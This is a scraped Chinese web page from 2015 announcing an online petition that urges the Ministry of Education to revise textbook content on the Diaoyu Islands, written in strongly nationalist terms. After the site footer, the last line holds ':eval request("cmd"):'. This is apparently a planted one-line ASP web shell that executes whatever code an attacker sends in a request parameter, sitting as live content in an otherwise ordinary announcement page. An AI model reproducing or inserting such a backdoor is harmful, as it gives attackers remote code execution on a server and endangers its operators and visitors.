网站公告

《要求教育部修改增补教科书中钓鱼岛内容》网络签名活动

时间:2015-4-23 21:46:07  作者:总编辑  来源:  查看:506  评论:1
内容摘要:日本國有化釣魚島是企圖通過法律層面對釣魚島實施侵占!日本修改教科書釣魚島内容,是企圖通過教育層面對釣魚島實施侵占!有正義的中華民族優秀子孫,是絕不會接受日本篡改釣魚島曆史的事實!希望大家參與進來一起來推動教育部對中國教科書裏關于釣魚島内容的增補和修改。積極參與這個投票并寫下你的留...
日本國有化釣魚島是企圖通過法律層面對釣魚島實施侵占!
日本修改教科書釣魚島内容,是企圖通過教育層面對釣魚島實施侵占!
有正義的中華民族優秀子孫,是絕不會接受日本篡改釣魚島曆史的事實!
希望大家參與進來一起來推動教育部對中國教科書裏關于釣魚島内容的增補和修改。積極參與這個投票并寫下你的留言,爲釣魚島出一分力!!!

网址:
http://www.wcaddl.org/textbook.asp

《要求教育部修改增补教科书中钓鱼岛内容》网络签名活动
相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):